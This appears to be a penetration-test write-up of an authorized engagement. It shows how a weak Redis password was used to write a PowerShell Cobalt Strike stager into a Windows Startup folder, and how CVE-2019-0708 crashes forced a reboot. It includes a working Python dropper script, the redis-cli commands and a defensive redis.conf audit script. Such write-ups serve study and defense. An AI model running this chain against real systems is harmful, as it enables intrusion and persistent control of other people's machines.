
Title: Redis Unauthorized Access + CVE-2019-0708 Combo Exploitation


0x01 Introduction

This is a real-world test. The test environment is part of an authorized project. Sensitive information has been redacted, and this writeup is for discussion and learning only. Please obtain authorization before testing.

When I received the authorized project, the customer only gave me a company name, which I have replaced here with "a certain company".

0x02 Information Collection

The usual routine: enumerate subdomains, then scan directories. I turned up a pile of things but nothing usable, and the host was in the cloud. On further asset detection, Ouli reported CVE-2019-0708. The target is a Windows Server 2008 R2 system.

0x03 Getshell

I thought to myself that with CVE-2019-0708 found, getting a shell would be a sure thing. I pulled out my trusty msf and went at it. Damn: I found it could not be used. The vulnerability check confirmed the target was vulnerable, but creating a session failed.

Unwilling to give up, I tried changing the target with set target, which made no difference. After more than 20 attempts the same error kept coming back, and the customer's target machine blue-screened more than 20 times along the way.

Going back through the collected information, I found a Redis asset. I tried weak passwords and found the password was 123123. First, check the server info:


There is a difficulty in exploiting it here: we have no idea of the website's actual physical path. Attempts to provoke an error message or brute-force the web root were fruitless, so we cannot get a webshell by writing a one-liner or anything similar. There is no crontab-style reverse shell as on Linux, and no scheduled task to write to.

From the earlier information collection we know the host is Windows Server 2008 R2. We can write a script that launches the trojan and drop it into the Startup folder, then use CVE-2019-0708 to "force" the host to restart.

So let's do it, using a PowerShell CS (Cobalt Strike) payload here (note that it is not AV-evading; that is not discussed here). First set Redis's working directory (dir) to the Windows Startup directory, then write the CS payload. Be sure to save, otherwise the key only ever lives in memory and nothing reaches disk.
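To make that sequence concrete, here is an added example (not the original author's code) that issues the same Redis commands over RESP with a raw socket and stops at the first error reply, which is what you get when CONFIG has been renamed away or the password is wrong. The host, port, Startup path, file name and the PowerShell stager string are placeholders. The `\r\n\r\n` padding around the one-liner is the trick from the post: the file Redis writes is an RDB snapshot, so the one-liner sits between a binary header and trailer, and the CRLFs put it on a line of its own that cmd.exe can execute while the surrounding junk lines fail harmlessly.

```python
"""Added example (not from the original post): write a file into the Windows
Startup folder via Redis CONFIG SET dir/dbfilename + SET + SAVE, speaking RESP
over a raw socket. Host, port, path, file name and stager are placeholders."""
import socket

TARGET_HOST = "192.0.2.10"      # placeholder (TEST-NET address)
TARGET_PORT = 6379              # placeholder
PASSWORD = "123123"             # the weak password reported in the post
STARTUP_DIR = ("c:/Users/Administrator/AppData/Roaming/Microsoft/Windows/"
               "Start Menu/Programs/Startup/")
DROP_NAME = "update.bat"        # dbfilename: bare file name, no path component
STAGER = 'powershell.exe -nop -w hidden -c "<stager goes here>"'  # placeholder


def resp_encode(*args):
    """Encode one command as a RESP array of bulk strings (what redis-cli sends)."""
    parts = [b"*%d\r\n" % len(args)]
    for a in args:
        b = a.encode() if isinstance(a, str) else a
        parts.append(b"$%d\r\n%s\r\n" % (len(b), b))
    return b"".join(parts)


def resp_decode_one(buf):
    """Decode the first reply in buf. Returns (kind, value, rest), or None if
    buf does not yet hold a complete reply. Handles +, -, : and $ replies."""
    end = buf.find(b"\r\n")
    if not buf or end < 0:
        return None
    kind, line, rest = chr(buf[0]), buf[1:end], buf[end + 2:]
    if kind in "+-:":
        return kind, line.decode(), rest
    if kind == "$":
        n = int(line)
        if n < 0:                      # null bulk string
            return kind, None, rest
        if len(rest) < n + 2:
            return None
        return kind, rest[:n].decode(errors="replace"), rest[n + 2:]
    raise ValueError("unsupported reply type %r" % kind)


def decode_all(buf):
    """Decode every complete reply in buf into a list of (kind, value)."""
    out = []
    while True:
        r = resp_decode_one(buf)
        if r is None:
            return out
        kind, value, buf = r
        out.append((kind, value))


def dropper_commands(password, startup_dir, filename, one_liner):
    """The exact sequence from the post. The CRLF padding puts the one-liner on
    its own line so cmd.exe skips the binary RDB header/trailer around it."""
    payload = "\r\n\r\n" + one_liner + "\r\n\r\n"
    return [
        resp_encode("AUTH", password),
        resp_encode("CONFIG", "SET", "dir", startup_dir),
        resp_encode("CONFIG", "SET", "dbfilename", filename),
        resp_encode("SET", "shell", payload),
        resp_encode("SAVE"),   # flush the RDB to disk; without it nothing is written
    ]


def first_failure(replies):
    """Index of the first reply that is not a simple-string OK, or None.
    '-ERR unknown command' here means CONFIG was renamed or disabled;
    '-NOAUTH' / '-WRONGPASS' means the password is wrong."""
    for i, (kind, _value) in enumerate(replies):
        if kind != "+":
            return i
    return None


def run(host=TARGET_HOST, port=TARGET_PORT, timeout=5):
    """Send the commands one at a time, stopping at the first non-OK reply."""
    cmds = dropper_commands(PASSWORD, STARTUP_DIR, DROP_NAME, STAGER)
    replies, buf = [], b""
    with socket.create_connection((host, port), timeout=timeout) as s:
        for c in cmds:
            s.sendall(c)
            while (r := resp_decode_one(buf)) is None:
                chunk = s.recv(4096)
                if not chunk:
                    raise ConnectionError("server closed connection")
                buf += chunk
            kind, value, buf = r
            replies.append((kind, value))
            if kind != "+":
                break
    return replies


if __name__ == "__main__":
    for kind, value in run():
        print(kind, value)
```

One check worth knowing if you type the SET by hand in redis-cli instead: escape sequences such as `\r\n` are only interpreted inside double-quoted arguments; inside single quotes they are written to the key literally, as backslash and letter. The example above sends the raw bytes itself, so the question does not arise.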

Use CVE-2019-0708 to "force" the host to restart. You can see the beacon came online successfully.

In actual testing, this startup item gets past a domestic antivirus product, but it is intercepted when it calls cmd.


0x04 Summary

1. Through information collection, the target was found to have CVE-2019-0708. Triggering the vulnerability blue-screens and restarts the system.
2. Through nmap scanning, the target was found to have port 3679 open, which is not the default Redis port but was running the Redis service.
3. Logging into Redis with the weak password 123123 succeeded, but the website's root directory is unknown, so the only option is to write a backdoor into the startup items.
4. Generate a PowerShell script backdoor in CS.
5. Write the payload (the one-liner argument after -c is not reproduced in the original):
    config set dir 'c:/Users/Administrator/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup/'
    config set dbfilename update.bat
    set shell '\r\n\r\npowershell.exe -nop -w hidden -c '
    save
    info
6. Restart the host via the CVE-2019-0708 blue screen; the CS beacon came online successfully.

Original article: https://mp.weixin.qq.com/s?__biz=Mzg4NTUwMzM1Ng==mid=2247489578idx=1sn=9dc27c1ad60bfbb4fdca0316ce18ee4cchksm=cfa6bc39f8d1352f5b0feb60e8029a68f8719ce8ac42a3d3475db722a319dacfe92e97da7607scene=178cur_album_id=1553386251775492098#rd
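On the defensive side, what made this chain possible is a Redis instance that accepts a guessable password from the network and still exposes CONFIG, so an attacker can point dir and dbfilename wherever they like. The following added example (not from the original post) audits a redis.conf for exactly those conditions. The two sample configurations are constructed for the example, and the weak-password list is a short illustrative one rather than a real wordlist.

```python
"""Added example (not from the original post): audit a redis.conf for the
settings that make the Redis-to-Startup-folder trick possible. The sample
configurations and the short weak-password list are constructed here."""

WEAK_PASSWORDS = {"123123", "123456", "redis", "password", "admin", "root"}
EXPOSED_BIND = {"0.0.0.0", "::", "*"}

# Constructed sample: roughly the state the post's target was in.
WEAK_CONF = """\
# redis.conf (weak)
bind 0.0.0.0
port 6379
protected-mode no
requirepass 123123
dir ./
"""

# Constructed sample: the same server with all four findings fixed.
HARDENED_CONF = """\
# redis.conf (hardened)
bind 127.0.0.1
port 6379
protected-mode yes
requirepass 7mN2vQx9LpR4sT6wYz1Bc3Df5Gh8Jk0M
rename-command CONFIG ""
rename-command FLUSHALL ""
rename-command DEBUG ""
dir /var/lib/redis
"""


def parse_conf(text):
    """Return [(directive, [args])] for non-comment lines, directives lowercased."""
    out = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split()
        out.append((parts[0].lower(), parts[1:]))
    return out


def audit_redis_conf(text):
    """Return a list of (finding_id, explanation) for the conditions that let an
    attacker reach CONFIG SET dir/dbfilename and drop a file where they like."""
    directives = parse_conf(text)

    def values(name):
        return [args for d, args in directives if d == name]

    findings = []

    # 1. Authentication: missing, empty, or a common weak value.
    passwords = values("requirepass")
    pw = passwords[-1][0] if passwords and passwords[-1] else ""
    if pw.strip('"') == "":
        findings.append(("no-password",
                         "requirepass unset: any client that reaches the port can run CONFIG SET"))
    elif pw in WEAK_PASSWORDS:
        findings.append(("weak-password",
                         "requirepass is a common weak value; one guess away from full control"))

    # 2. Network exposure: no bind line, or bound to every interface.
    binds = values("bind")
    addrs = [a for args in binds for a in args]
    if not binds or any(a in EXPOSED_BIND for a in addrs):
        findings.append(("exposed-bind",
                         "no bind or bind to all interfaces: Redis is reachable from the network"))

    # 3. protected-mode explicitly turned off.
    pm = values("protected-mode")
    if pm and pm[-1] and pm[-1][0].lower() == "no":
        findings.append(("protected-mode-off",
                         "protected-mode no: the safeguard for an unbound, passwordless instance is off"))

    # 4. CONFIG still reachable under its real name (renamed or disabled is fine).
    renamed = {args[0].upper() for args in values("rename-command") if args}
    if "CONFIG" not in renamed:
        findings.append(("config-command-enabled",
                         'CONFIG is not renamed/disabled: rename-command CONFIG "" blocks dir/dbfilename rewrites'))

    return findings


if __name__ == "__main__":
    for label, conf in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(label, [fid for fid, _ in audit_redis_conf(conf)])
```

The four checks map one-to-one onto the steps in the summary: the weak password is what got the author in, the network bind is what let the scan find the port, and a renamed CONFIG command is what would have stopped the dir/dbfilename rewrite even after a successful login.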
